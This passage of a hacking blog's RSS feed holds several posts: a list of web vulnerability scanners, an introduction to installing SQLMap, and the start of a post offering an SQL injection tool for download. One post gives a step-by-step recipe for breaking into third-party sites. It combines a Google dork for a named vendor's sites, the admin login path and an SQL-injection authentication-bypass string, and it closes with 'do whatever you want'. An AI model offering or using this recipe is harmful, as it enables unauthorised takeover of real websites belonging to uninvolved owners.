<p>Documentation: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fsubgraph.com%2Fvega%2Fdocumentation%2Findex.en.html" rel="nofollow noopener external" onclick="this.target='_blank';">https://subgraph.com/vega/documentation/index.en.html</a><br />Download Vega: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fsubgraph.com%2Fvega%2F" rel="nofollow noopener external" onclick="this.target='_blank';">https://subgraph.com/vega/</a></p>
<p>3. <b>Zed Attack Proxy:</b></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1890" src="https://anonyviet.com/wp-content/uploads/2016/04/3-1.png" alt="3" width="649" height="470" srcset="https://anonyviet.com/wp-content/uploads/2016/04/3-1.png 649w, https://anonyviet.com/wp-content/uploads/2016/04/3-1-300x217.png 300w, https://anonyviet.com/wp-content/uploads/2016/04/3-1-120x86.png 120w" sizes="auto, (max-width: 649px) 100vw, 649px" title="14 Web Vulnerability Scan Tools to Exploit 15"/><br />This is a tool developed by AWASP that runs on Windows, OSX, Unix, Linux platforms.  This is a simple and easy to use tool.<br />Its features are listed below:<br />Intercepting Proxy<br />Automatic Scanner<br />Traditional but powerful spiders<br />Fuzzer<br />Web Socket Support<br />Plug-n-hack support<br />Authentication support<br />REST based API<br />Dynamic SSL certificates<br />Smartcard and Client Digital Certificates support</p>
<p>Download ZAP : <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fcode.google.com%2Fp%2Fzaproxy%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://code.google.com/p/zaproxy/</a></p>
<p>4. <b>Wapiti</b> :</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F04%2F4-1.png" rel="attachment wp-att-1891 noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1891" src="https://anonyviet.com/wp-content/uploads/2016/04/4-1.png" alt="4" width="400" height="414" srcset="https://anonyviet.com/wp-content/uploads/2016/04/4-1.png 400w, https://anonyviet.com/wp-content/uploads/2016/04/4-1-290x300.png 290w" sizes="auto, (max-width: 400px) 100vw, 400px" title="14 Web Vulnerability Scan Tools to Exploit 16"/></a><br />This is also a good website security testing tool.  Its web security testing method is to scan links and insert test data on objects (texbox…), it supports GET and HTTP POST.  Vulnerabilities that can be detected with this tool:</p>
<p>File Disclosure<br />File inclusion<br />Cross Site Scripting (XSS)<br />Command execution detection<br />CRLF Injection<br />SEL Injection and Xpath Injection<br />Weak .htaccess configuration<br />Backup files disclosure</p>
<p>This is a tool that uses the command line to manipulate, so it is difficult for experts to use for beginners.</p>
<p>Download Wapiti with source code: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwapiti.sourceforge.net%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://wapiti.sourceforge.net/</a></p>
<p>5. <b>W3af</b> :</p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1895" src="https://anonyviet.com/wp-content/uploads/2016/04/w3af_cold_start.png" alt="w3af_cold_start" width="1280" height="774" srcset="https://anonyviet.com/wp-content/uploads/2016/04/w3af_cold_start.png 1280w, https://anonyviet.com/wp-content/uploads/2016/04/w3af_cold_start-300x181.png 300w, https://anonyviet.com/wp-content/uploads/2016/04/w3af_cold_start-1024x619.png 1024w, https://anonyviet.com/wp-content/uploads/2016/04/w3af_cold_start-768x464.png 768w, https://anonyviet.com/wp-content/uploads/2016/04/w3af_cold_start-750x454.png 750w, https://anonyviet.com/wp-content/uploads/2016/04/w3af_cold_start-1140x689.png 1140w" sizes="auto, (max-width: 1280px) 100vw, 1280px" title="14 Web Vulnerability Scan Tools to Exploit 17"/><br />This web security testing tool is developed in python language.  Using this tool you can check more than 200 web application vulnerabilities including dangerous vulnerabilities such as: SQL injection, Cross-Site Scripting.</p>
<p>The special thing is that this tool is accompanied by a graphical interface with options that allow users to easily use it.<br />More details about this tool:</p>
<p><a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fandresriancho%2Fw3af%2F" rel="nofollow noopener external" onclick="this.target='_blank';">https://github.com/andresriancho/w3af/</a><br />Download it from the official website: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fw3af.org%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://w3af.org/</a></p>
<p>6. <b>WebScarab</b> :</p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1892" src="https://anonyviet.com/wp-content/uploads/2016/04/5-1.png" alt="5" width="907" height="403" srcset="https://anonyviet.com/wp-content/uploads/2016/04/5-1.png 907w, https://anonyviet.com/wp-content/uploads/2016/04/5-1-300x133.png 300w, https://anonyviet.com/wp-content/uploads/2016/04/5-1-768x341.png 768w, https://anonyviet.com/wp-content/uploads/2016/04/5-1-750x333.png 750w" sizes="auto, (max-width: 907px) 100vw, 907px" title="14 Web Vulnerability Scan Tools to Exploit 18"/><br />This is not a beginner tool as it is designed for people who have a good understanding of HTTP and know how to code.<br />In addition to features like other website security testing tools, the tool has a spider-like function that automatically finds the target&#8217;s links and generates scripts to check for vulnerabilities on those links.<br />Vulnerabilities can be detected by the tool: SQL injection, XSS< CRLF and many more.</p>
<p>Source code of the tool is available on Github: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2FOWASP%2FOWASP-WebScarab" rel="nofollow noopener external" onclick="this.target='_blank';">https://github.com/OWASP/OWASP-WebScarab</a><br />Download WebScarab here: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.owasp.org%2Findex.php%2FCategory%3AOWASP_WebScarab_Project" rel="nofollow noopener external" onclick="this.target='_blank';">https://www.owasp.org/index.php/Cate…Scarab_Project</a></p>
<p>7. <b>Skipfish</b> :<br /><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1893" src="https://anonyviet.com/wp-content/uploads/2016/04/6-1.png" alt="6" width="1107" height="780" srcset="https://anonyviet.com/wp-content/uploads/2016/04/6-1.png 1107w, https://anonyviet.com/wp-content/uploads/2016/04/6-1-300x211.png 300w, https://anonyviet.com/wp-content/uploads/2016/04/6-1-1024x722.png 1024w, https://anonyviet.com/wp-content/uploads/2016/04/6-1-768x541.png 768w, https://anonyviet.com/wp-content/uploads/2016/04/6-1-120x86.png 120w, https://anonyviet.com/wp-content/uploads/2016/04/6-1-750x528.png 750w" sizes="auto, (max-width: 1107px) 100vw, 1107px" title="14 Web Vulnerability Scan Tools to Exploit 19"/><br />This is a tool written in C programming language. It is optimized to run 2000 requests per second without too much CPU of the computer, so the speed is quite fast.<br />This tool is run on platforms: OSX, Linux, Window.</p>
<p>Download Skipfish or code from GOogle Codes: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fcode.google.com%2Fp%2Fskipfish%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://code.google.com/p/skipfish/</a></p>
<p>8. <b>Ratproxy</b>:<br />Ratproxy is also an open source web application security testing tool.  It supports Linux, FreeBSD, MacOS X, and (Cygwin) Windows environments.<br /><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F04%2Fratproxy-screen.gif" rel="attachment wp-att-1896 noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-1896" src="https://anonyviet.com/wp-content/uploads/2016/04/ratproxy-screen.gif" alt="ratproxy-screen" width="560" height="431" title="14 Web Vulnerability Scan Tools to Exploit 20"/></a><br />This tool is designed to overcome problems users often face when using other proxy tools for security checks.  It has the ability to distinguish between css and JavaScript code.  It also supports the SSL protocol during security checks, which means you can also view the data when the website runs SSL.</p>
<p>You can read more about this tool here: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fcode.google.com%2Fp%2Fratproxy%2Fwiki%2FRatproxyDoc" rel="nofollow noopener external" onclick="this.target='_blank';">http://code.google.com/p/ratproxy/wiki/RatproxyDoc</a><br />Download <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fcode.google.com%2Fp%2Fratproxy%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://code.google.com/p/ratproxy/</a></p>
<p>9. <b>SQLMap</b> :<br />This is probably the most commonly used tool and many of you know about it.<br />QALMap is written in Python programming language and runs by command line on all 3 platforms OSX, Linux, Window.<br />You can learn more about this tool at:</p>
<p><a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fsqlmapproject%2Fsqlmap" rel="nofollow noopener external" onclick="this.target='_blank';">https://github.com/sqlmapproject/sqlmap</a><br />Download SQLMap here: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fsqlmapproject%2Fsqlmap" rel="nofollow noopener external" onclick="this.target='_blank';">https://github.com/sqlmapproject/sqlmap</a></p>
<p>ten.<b> Wfuzz</b>:</p>
<p>Wfuzz is a free and open source tool for web application security testing.  It can be used to execute GET and POST queries to detect security vulnerabilities such as SQL, XSS, LDAP and many more.  It also supports cookie fuzzing, multi-threading, SOCK, Proxy, Authentication, parameters brute forcing, multiple proxy…vvv<br />This is a tool that does not support the interface, so you must use the command line to use it.</p>
<p>Download Wfuzz from code.google.com: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fcode.google.com%2Fp%2Fwfuzz%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://code.google.com/p/wfuzz/</a></p>
<p>11. <b>Grendel-Scan</b>:<br />This is a tool developed in Java language that runs on OSX, Linux and Window platforms.  It helps professionals quickly find web application vulnerabilities.</p>
<p>Download the tool and source code: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fgrendel%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://sourceforge.net/projects/grendel/</a></p>
<p>twelfth. <b>Watcher</b>:<br />Different from other tools this is a passive program in the form of an add-on.  To use it you need to install Fiddler first and then install the Watcher add-on.<br />As a passive scanner, it does not affect the website or its infrastructure.</p>
<p>Download watcher and its source code: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwebsecuritytool.codeplex.com%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://websecuritytool.codeplex.com/</a></p>
<p>13. <b>X5S</b>:<br />This is a Fiddler add-on to use it you must also install Fiddler first.</p>
<p>Download X5S and source code from codeplex: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fxss.codeplex.com%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://xss.codeplex.com/</a></p>
<p>14. <b>Arachni</b>:<br />Arachni is an open source tool developed to provide a penetration testing environment.  This tool can detect various web application security vulnerabilities.  It can detect various vulnerabilities like SQL Injection, XSS, Local File inclusion, remote file inclusion, unvalidated redirect and many more.</p>
<p>Download this tool here: <a target="_blank" class="externalLink ext-link" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwww.arachni-scanner.com%2F" rel="nofollow noopener external" onclick="this.target='_blank';">http://www.arachni-scanner.com/</a></p>
<p>Through this article, you can know some more tools to help find website security vulnerabilities.  The article I only briefly introduced about the above tools, I hope you will have detailed articles introducing that layer of tools for everyone to learn.</p>
<p style="text-align: right;">Source: resources dot infosecinstitute dot com</p>
<p style="text-align: right;">Website Vulnerability Scan Tool</p>
<p style="text-align: right;">Website error scanning tool</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1887&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/14-web-vulnerability-scan-tools-to-exploit/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2016/04/2-1.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Tut exploit error Website Admin Page 0day 29/4/2017</title>
		<link>https://en.anonyviet.com/tut-exploit-error-website-admin-page-0day-29-4-2017/</link>
					<comments>https://en.anonyviet.com/tut-exploit-error-website-admin-page-0day-29-4-2017/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 30 Jan 2023 04:37:11 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[Admin]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[page]]></category>
		<category><![CDATA[Tut]]></category>
		<category><![CDATA[Website]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6581</guid>

					<description><![CDATA[Step 1: Go to google and type the search command: Join the channel Telegram of the AnonyViet 👉 Link 👈 "Powered by Ofek Technologies" or "Designed By Ofek Technologies" Step 2: Go to any Website, add the admin link after: site-bi-hack.com/index.php/admin/login.html Step 3: Login with User and Pass as below [+] Username: '=' 'or'&#13; [+] [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<h2 id="ftoc-buoc-1" class="ftwp-heading"><span style="color: #0000ff;"><strong>Step 1:</strong></span></h2>
<p>Go to google and type the search command:</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<pre class="lang:default decode:true">"Powered by Ofek Technologies"</pre>
<p>or</p>
<pre class="lang:default decode:true ">"Designed By Ofek Technologies"</pre>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F04%2F1-2.png" rel="noopener" class="local-link"><img decoding="async" class="aligncenter size-full wp-image-5240" src="https://anonyviet.com/wp-content/uploads/2017/04/1-2.png" alt="Tut exploit error Website Admin Page 0day 29/4/2017 6" width="980" height="76" srcset="https://anonyviet.com/wp-content/uploads/2017/04/1-2.png 980w, https://anonyviet.com/wp-content/uploads/2017/04/1-2-300x23.png 300w, https://anonyviet.com/wp-content/uploads/2017/04/1-2-768x60.png 768w, https://anonyviet.com/wp-content/uploads/2017/04/1-2-750x58.png 750w" sizes="(max-width: 980px) 100vw, 980px" title="Tut exploit error Website Admin Page 0day 29/4/2017 9"/></a></p>
<h2 id="ftoc-buoc-2" class="ftwp-heading"><span style="color: #0000ff;"><strong>Step 2:</strong></span></h2>
<p>Go to any Website, add the admin link after:</p>
<pre class="lang:default decode:true ">site-bi-hack.com/index.php/admin/login.html</pre>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-5241" src="https://anonyviet.com/wp-content/uploads/2017/04/2-2.png" alt="Tut exploit error Website Admin Page 0day 29/4/2017 7" width="804" height="42" srcset="https://anonyviet.com/wp-content/uploads/2017/04/2-2.png 804w, https://anonyviet.com/wp-content/uploads/2017/04/2-2-300x16.png 300w, https://anonyviet.com/wp-content/uploads/2017/04/2-2-768x40.png 768w, https://anonyviet.com/wp-content/uploads/2017/04/2-2-750x39.png 750w" sizes="auto, (max-width: 804px) 100vw, 804px" title="Tut exploit error Website Admin Page 0day 29/4/2017 10"/></p>
<h2 id="ftoc-buoc-3" class="ftwp-heading"><span style="color: #0000ff;"><strong>Step 3:</strong></span></h2>
<p>Login with User and Pass as below</p>
<pre class="lang:default decode:true ">[+] Username: '=' 'or'&#13;
[+] Password: '=' 'or'</pre>
<p><img decoding="async" loading="lazy" class="aligncenter  wp-image-5242" src="https://anonyviet.com/wp-content/uploads/2017/04/3-1.png" alt="Tut exploit error Website Admin Page 0day 29/4/2017 8" width="335" height="206" srcset="https://anonyviet.com/wp-content/uploads/2017/04/3-1.png 523w, https://anonyviet.com/wp-content/uploads/2017/04/3-1-300x185.png 300w" sizes="auto, (max-width: 335px) 100vw, 335px" title="Tut exploit error Website Admin Page 0day 29/4/2017 11"/></p>
<h2 id="ftoc-buoc-4" class="ftwp-heading"><span style="color: #0000ff;"><strong>Step 4:</strong></span></h2>
<p>Full Admin rights, do whatever you want</p>
<p><img post-id="6581" fifu-featured="1" decoding="async" loading="lazy" class="aligncenter size-full wp-image-5243" src="https://anonyviet.com/wp-content/uploads/2017/04/4-1.png" alt="Tut exploit error Website Admin Page 0day 29/4/2017" title="Tut exploit error Website Admin Page 0day 29/4/2017" width="1310" height="711" srcset="https://anonyviet.com/wp-content/uploads/2017/04/4-1.png 1310w, https://anonyviet.com/wp-content/uploads/2017/04/4-1-300x163.png 300w, https://anonyviet.com/wp-content/uploads/2017/04/4-1-1024x556.png 1024w, https://anonyviet.com/wp-content/uploads/2017/04/4-1-768x417.png 768w, https://anonyviet.com/wp-content/uploads/2017/04/4-1-750x407.png 750w, https://anonyviet.com/wp-content/uploads/2017/04/4-1-1140x619.png 1140w" sizes="auto, (max-width: 1310px) 100vw, 1310px" title="Tut exploit error Website Admin Page 0day 29/4/2017 12"/></p>
<p style="text-align: right;">Thanks : |  nginxDEX – Vcry – Kerens_id – StuxN3t – Codename – CowoKerensTeam – trenggalek6etar – XaiSyndicate -indoXploit |</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;5239&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/tut-exploit-error-website-admin-page-0day-29-4-2017/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/04/4-1.png" medium="image"></media:content>
            	</item>
		<item>
		<title>SQLMap v1.2.9 &#8211; The Most Powerful SQL Injection Vulnerability Exploit</title>
		<link>https://en.anonyviet.com/sqlmap-v1-2-9-the-most-powerful-sql-injection-vulnerability-exploit/</link>
					<comments>https://en.anonyviet.com/sqlmap-v1-2-9-the-most-powerful-sql-injection-vulnerability-exploit/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 29 Jan 2023 04:33:35 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Injection]]></category>
		<category><![CDATA[powerful]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQLMap]]></category>
		<category><![CDATA[v1.2.9]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=5991</guid>

					<description><![CDATA[Today we talk about Hacking with an old but new tool. SQL Injection vulnerabilities have been around for a long time and are quite familiar to us. However, this error is old but still dangerous for any website to make. Join the channel Telegram of the AnonyViet 👉 Link 👈 The reason is compared to [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p style="text-align: justify;"><strong>Today we talk about Hacking with an old but new tool.  SQL Injection vulnerabilities have been around for a long time and are quite familiar to us.  However, this error is old but still dangerous for any website to make.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>The reason is compared to the lack of care in the process of writing data processing code for the website.  This vulnerability is often used by Kiddie Scripts to wreak havoc.  By the way, if you don&#8217;t know who Script Kidde is referring to?  then please read <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fscript-kiddie-nhung-ke-tu-xung-hacker%2F" rel="noopener" class="local-link">here</a>.</p>
<p>This bug allows an intruder to request the server to return data without logging in.  So what do you think if information about the admin account is requested to be sent to Hacker?  Is the whole website going to go to hell with this Hacker game?</p>
<h2 id="ftoc-tan-dung-sqlmap-de-tim-lo-hong-sql-injection" class="ftwp-heading">Leverage SQLMap to Find SQL Injection Vulnerabilities</h2>
<p>You don&#8217;t have to work hard to learn each command line like before and it doesn&#8217;t take too much time.  If you are a <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fscript-kiddie-nhung-ke-tu-xung-hacker%2F" rel="noopener" class="local-link">Script Kidde</a> ?  You will surely love it <strong>SQLMap </strong>and what it can do for you.  First of all, I would like to briefly explain about SQLMap for those who do not know.</p>
<h3 id="ftoc-sqlmap-la-gi" class="ftwp-heading">What is SQLMap?</h3>
<p>This is a tool to help you exploit SQL-related vulnerabilities quickly.  This tool is considered the most powerful weapon in terms of exploiting this SQL vulnerability.  When learning Hacking, you definitely have to use it more or less.</p>
<p>It has many features suitable for SQL penetration testers and a series of automatic branching tools to get the database footprint to fetch data from the database.  Support for accessing the underlying file system and executing commands on the operating system over an out-of-band connection.</p>
<p>That is, when you get in, you will be able to manipulate their data through the network connection.</p>
<p><img post-id="5991" fifu-featured="1" decoding="async" class="aligncenter wp-image-11161 size-full" src="https://anonyviet.com/wp-content/uploads/2018/09/sqlMap.png" alt="SQLMap v1.2.9 &#8211; The Most Powerful SQL Injection Vulnerability Exploit" title="SQLMap v1.2.9 &#8211; The Most Powerful SQL Injection Vulnerability Exploit" width="640" height="483" srcset="https://anonyviet.com/wp-content/uploads/2018/09/sqlMap.png 640w, https://anonyviet.com/wp-content/uploads/2018/09/sqlMap-300x226.png 300w" sizes="(max-width: 640px) 100vw, 640px" title="SQLMap v1.2.9 - The 6 Most Powerful SQL Injection Vulnerability Exploit"/></p>
<p>Operating system <strong>Kali Linux</strong> or <strong>Back Track 5</strong> SQLMap already has built-in.  But for Windows, you have to install Python and SQLMAP to use it.  Because SQLMap is written in Python and requires a Python library in your computer to run.</p>
<h3 id="ftoc-cai-dat-python" class="ftwp-heading">Install Python</h3>
<p>As mentioned above, to use SQLMap, you must have a Python library on your computer.  You can download and install the Python library at the homepage <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.python.org%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://www.python.org/</a> (It is recommended to install version from 2.7 or higher).</p>
<h2 id="ftoc-sqlmap-v1-2-9-co-gi-moi" class="ftwp-heading">What&#8217;s new in SQLMap v1.2.9?</h2>
<p>This is a weapon that has existed for a long time through many versions.  But now, it has just been updated to version 1.2.9 with many new features.  Specifically, information about the new features in this update is:</p>
<ul>
<li>Full support for database management systems <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB</strong> and<strong> Informix.</strong></li>
<li>Full support for six SQL Injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li>Allows direct connection to the database without passing through SQL injection.  You just need to enter the DBMS login information, IP address, Port and Database name you want to connect.  (This is what I like.)</li>
<li>Supports enumeration of users, password hashes, privileges, roles, databases, tables and columns.</li>
<li>Helps you to crack the hash of user passwords.  That means you can reverse-decrypt and get the password of any user you want.</li>
<li>Allow to copy (backup) the database as you like.</li>
<li>Provides full control over the database upon successful intrusion.</li>
<li>Allows you to Download and Upload Files comfortably to the Database very quickly.</li>
</ul>
<p>There are a few more special features that I have not listed.  Experience it yourself and enjoy with this new version.  Now I will guide you to install SQLMap (remember to install Python first).</p>
<h2 id="ftoc-cai-dat-sqlmap" class="ftwp-heading">Install SQLMap</h2>
<p>You can download the compressed file directly at one of the two links below.</p>
<p>Alternatively, you can use the command <strong>Git </strong>to Clone the original from the manufacturer.</p>
<pre class="theme:cg-cookie lang:default decode:true ">git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</pre>
<h2 id="ftoc-cach-su-dung" class="ftwp-heading">Using</h2>
<p>Use the command below to display the basic commands in <strong>SQLMap v1.2.9</strong></p>
<pre class="theme:cg-cookie lang:default decode:true ">python sqlmap.py -h</pre>
<p>From the commands listed, you can Google more about their meaning if you want to understand more deeply.  Because its statements are many with different functions.  I cannot say it all in one post.</p>
<p style="text-align: right;">Good luck<br />Lmint</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;11159&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/sqlmap-v1-2-9-the-most-powerful-sql-injection-vulnerability-exploit/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2018/09/sqlMap.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Download SQLi Dumper v10.1 Full &#8211; SQL Injection Error Exploit Tool</title>
		<link>https://en.anonyviet.com/download-sqli-dumper-v10-1-full-sql-injection-error-exploit-tool/</link>
					<comments>https://en.anonyviet.com/download-sqli-dumper-v10-1-full-sql-injection-error-exploit-tool/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 28 Jan 2023 04:30:10 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[Dumper]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Full]]></category>
		<category><![CDATA[Injection]]></category>
